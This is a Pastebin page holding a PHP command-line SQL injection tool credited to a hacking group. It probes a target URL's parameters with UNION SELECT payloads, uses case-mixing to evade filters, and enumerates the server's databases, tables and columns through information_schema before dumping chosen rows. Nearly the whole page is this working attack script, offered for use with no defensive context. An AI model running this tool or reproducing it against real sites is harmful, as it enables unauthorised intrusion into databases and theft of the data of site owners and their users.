API tools faq
paste
jesobreira

SQL Injector

jesobreira
Mar 18th, 2013
176
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.76 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3.   WhiteCollarGroup
  4.   tinyurl.com/WCollarGroup
  5.  
  6.   Coded by 0KaL @0KaL_H4
  7. */
  8.  
  9. error_reporting(0);
  10. set_time_limit(0);
  11. ini_set("default_socket_timeout", 30);
  12. $debug = true;
  13.  
  14. $token = "wc_".uniqid();
  15. $token_hex = hex($token);
  16.  
  17. if($argc<2) {
  18.   show("Enter full target URL.", "?");
  19.   $target = gets();
  20. } else {
  21.   $target = $argv[1];
  22. }
  23.  
  24. // first tests
  25. show("Checking if URL is stable...");
  26. if(!filter_var($target, FILTER_VALIDATE_URL)) die("Invalid URL.\n");
  27. $target_data = parse_url($target);
  28. if(!$target_data['query']) die("No arguments/query data was found on this URL.\n");
  29. if(!file_get_contents($target)) die("Could not connect to the specified URL.\n");
  30.  
  31. $parameters = convertUrlQuery($target_data['query']);
  32. $payload = null;
  33. foreach($parameters as $par=>$value) {
  34.   show("Testing \"$par\" parameter...");
  35.   for($i = 0; $i <= 8; $i++) {
  36.     $numbers = array();
  37.     for($j = 0; $j <= $i; $j++) {
  38.       $numbers[] = $token_hex;
  39.     }
  40.     $numbers = implode(",", $numbers);
  41.     $get = request(parameters($par)."&$par=-$value+UNION+ALL+SELECT+$numbers--+");
  42.     if(preg_match("/$token/", $get)) {
  43.       $payload = parameters($par)."&$par=-$value+";
  44.       $payload_amount = $i;
  45.       break 2;
  46.     } else {
  47.       $get = request(parameters($par)."&$par=-$value'+UNION+ALL+SELECT $numbers--+");
  48.       if(preg_match("/$token/", $get)) {
  49.         $payload = parameters($par)."&$par=-$value'+";
  50.         $payload_amount = $i;
  51.         break 2;
  52.       } else {
  53.         $get = request(parameters($par)."&$par=-$value\"+UNION+ALL+SELECT+$numbers--+");
  54.         if(preg_match("/$token/", $get)) {
  55.           $payload = parameters($par)."&$par=-$value\"+";
  56.           $payload_amount = $i;
  57.           break 2;
  58.         }
  59.       }
  60.     }
  61.   }
  62. }
  63.  
  64. if($payload) {
  65.   show("Payload found.", ".");
  66.   show("Selected columns: ".((string)$payload_amount+1), "i");
  67. } else {
  68.   die("No vulnerable parameters.\n");
  69. }
  70.  
  71. show("Getting server data...");
  72. $version = getdata("version()");
  73. show("MySQL version: $version", "i");
  74. $user = getdata("user()");
  75. show("MySQL user: $user", "i");
  76. $currentdb = getdata("database()");
  77. show("Current database: $currentdb", "i");
  78. if((int)$version<5) {
  79.   show("Sorry. This server is vulnerable, but this app can only hack 5 or newer MySQL versions.");
  80.   exit;
  81. }
  82.  
  83. show("Getting MySQL databases...");
  84. $i = 0;
  85. while(true) {
  86.   $db = getdata("(SELECT schema_name FROM information_schema.schemata LIMIT $i,1)");
  87.   if(!$db) break;
  88.   show("Database: ".$db, ">");
  89.   $i++;
  90. }
  91.  
  92. show("Enter the name of the database you want to read.", "?");
  93. $db2get = gets();
  94.  
  95. show("Getting tables...");
  96. $i = 0;
  97. while(true) {
  98.   $db = getdata("(SELECT table_name FROM information_schema.tables WHERE table_schema=".hex($db2get)." LIMIT $i,1)");
  99.   if(!$db) break;
  100.   show("Table: ".$db, ">");
  101.   $i++;
  102. }
  103.  
  104. show("Enter the name of the table you want to read.", "?");
  105. $tbl2get = gets();
  106. show("Getting columns...");
  107. $i = 0;
  108. while(true) {
  109.   $db = getdata("(SELECT column_name FROM information_schema.columns WHERE table_name=".hex($tbl2get)." AND table_schema=".hex($db2get)." LIMIT $i,1)");
  110.   if(!$db) break;
  111.   show("Column: ".$db, ">");
  112.   $i++;
  113. }
  114.  
  115. show("Enter the name of the columns you want to read, separated by comma (\",\").", "?");
  116. $clm2get = gets();
  117. $clm2get = explode(",", $clm2get);
  118. $i = 0;
  119. while(true) {
  120.   show("Line $i", ">");
  121.   foreach($clm2get as $clm) {
  122.     $get = getdata("(SELECT $clm FROM $db2get.$tbl2get LIMIT $i,1)");
  123.     if(!$get) break;
  124.     show($clm."= ".$get, ">");
  125.   }
  126.   echo "\n";
  127.   $i++;
  128. }
  129.  
  130. echo "Done.\n";
  131.  
  132. // lib
  133.  
  134. function gets() {
  135.     return trim(fgets(STDIN));
  136. }
  137.  
  138. function hex($string){
  139.     $hex=''; // PHP 'Dim' =]
  140.     for ($i=0; $i < strlen($string); $i++){
  141.         $hex .= dechex(ord($string[$i]));
  142.     }
  143.     return '0x'.$hex;
  144. }
  145.  
  146. function convertUrlQuery($query) {
  147.     $queryParts = explode('&', $query);
  148.    
  149.     $params = array();
  150.     foreach ($queryParts as $param) {
  151.         $item = explode('=', $param);
  152.         $params[$item[0]] = $item[1];
  153.     }
  154.    
  155.     return $params;
  156. }
  157.  
  158. function show($msg, $ico="*") {
  159.   echo "[".$ico."] ".$msg."\n";
  160. }
  161.  
  162. function request($data) {
  163.   global $target,$target_data;
  164.   $tg = str_replace($target_data['query'], null, $target);
  165.   $words = array("UNION", "SELECT", "ALL", "concat", "information_schema", "tables", "columns", "schemata", "table_name", "column_name", "schema_name", "FROM", "LIMIT", "ORDER", "WHERE");
  166.   foreach($words as $word) {
  167.     $data = str_replace($word, upperlower($word), $data);
  168.   }
  169.   $url = str_replace(array(
  170.     "?&",
  171.     "+",
  172.     "'",
  173.     '"',
  174.     " "
  175.   ), array(
  176.     "?",
  177.     "%20",
  178.     urlencode("'"),
  179.     urlencode('"'),
  180.     "%20"
  181.   ), $tg.$data);
  182.   $read = file_get_contents($url);
  183.   if(!$read) $read = file_get_contents($url);
  184.   return $read;
  185. }
  186.  
  187. function getdata($data) {
  188.   global $target,$target_data,$payload,$payload_amount,$token,$token_hex;
  189.   $gtdata = array();
  190.   for($i = 0; $i <= $payload_amount; $i++) {
  191.     $gtdata[] = "unhex(hex(concat($token_hex, ($data), $token_hex)))";
  192.   }
  193.   $gtdata = implode(",", $gtdata);
  194.   $get = request($payload."UNION+ALL+SELECT+$gtdata+LIMIT 0,1--+");
  195.   $results = array();
  196.   preg_match_all("/$token(.*)$token/", $get, $results);
  197.   if(isset($results[1][0])) return $results[1][0];
  198.   else return false;
  199. }
  200.  
  201. function parameters($exception) {
  202.   global $parameters;
  203.   $pars = $parameters;
  204.   unset($pars[$exception]);
  205.   return http_build_query($pars);
  206. }
  207.  
  208. function upperlower($str) {
  209.   $j = strlen($str)-1;
  210.   $newstr = null;
  211.   for($i = 0; $i <= $j; $i++) {
  212.     if($i % 2 == 0) {
  213.       $newstr .= strtoupper($str[$i]);
  214.     } else {
  215.       $newstr .= strtolower($str[$i]);
  216.     }
  217.   }
  218.   return $newstr;
  219. }
  220.  
  221. function debug($msg) {
  222.   global $debug;
  223.   if($debug) show($msg, "D");
  224. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!